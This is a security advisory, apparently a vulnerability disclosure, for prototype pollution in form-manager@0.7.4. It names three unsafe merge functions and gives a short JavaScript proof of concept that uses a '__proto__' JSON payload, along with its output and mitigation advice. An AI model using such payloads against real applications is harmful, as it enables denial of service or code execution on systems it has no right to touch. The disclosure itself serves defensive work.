Prototype pollution vulnerability affecting form-manager@0.7.4

[mestrtee]

Overview

The module is vulenrable via three functions: , located at setDefaults (form-manager/cjs/index.js:1299), mergeBranch (form-manager/cjs/index.js:1249), and Object.setObjectValue (form-manager/cjs/index.js:1536) respectively. In all these implementations, the assignment of the property from source to destination occurred without proper protection.
An attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties __proto__ or constructor.prototype.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.

PoC:

(async () => {
  const lib = await import('@allpro/form-manager');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
// uncomment one at a time
  lib.default.defaultsDeep ({}, BAD_JSON)
  //lib.default.merge ({}, BAD_JSON)
  //lib.default.setObjectValue ({}, "__proto__.polluted", true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

Assign or copy a property should only be applied an own property of the destination object, thus, check for that (e.g using hasOwnProperty) is sufficient. Alternatively, block the property names __proto__ or constructor assigned. Other recommendations at Snyk.io:
https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b